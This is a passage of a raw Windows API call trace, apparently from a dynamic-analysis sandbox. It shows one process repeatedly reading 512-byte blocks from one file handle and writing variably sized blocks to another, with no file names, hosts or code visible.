lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.679] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x33f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.679] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.680] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x309, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.680] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.681] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x33e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.681] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.682] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x328, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.682] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.683] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x333, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.683] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.684] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2f0, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.684] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.685] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x306, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.685] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.686] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x32a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.686] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.686] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x36f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.687] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.687] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x346, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.688] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.688] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x352, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.689] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.690] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x34b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.690] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.691] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x33c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.691] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.692] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x353, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.692] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.693] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x37f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.693] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.694] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x36e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.694] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.695] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x350, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.695] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.696] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3b0, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.696] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.697] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.697] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.697] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x31a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.698] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.698] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x317, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.699] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.699] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x399, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.700] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.700] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x32c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.701] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.701] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.702] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x115, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.702] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.703] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x23b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.703] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.704] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ea, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.704] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.705] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x23f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.705] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.706] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x285, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.706] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.707] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2d6, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.707] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.708] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x324, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.708] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.709] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x30b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.709] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.710] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x31b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.710] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.711] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x329, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.711] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.712] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2f8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.712] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.712] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3cb, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.713] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.713] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.714] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xcf, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.714] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.715] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.715] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x21a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.716] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.716] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.717] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x11a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.717] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.718] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.718] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xf1, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.719] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.719] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.720] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1a2, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.720] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.721] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.722] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1f4, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.722] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.723] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.723] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x27e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.724] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.724] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.725] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x26a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.725] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.725] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.726] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xdb, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.726] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.727] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.727] WriteFile (in: hFile=0x2b4, 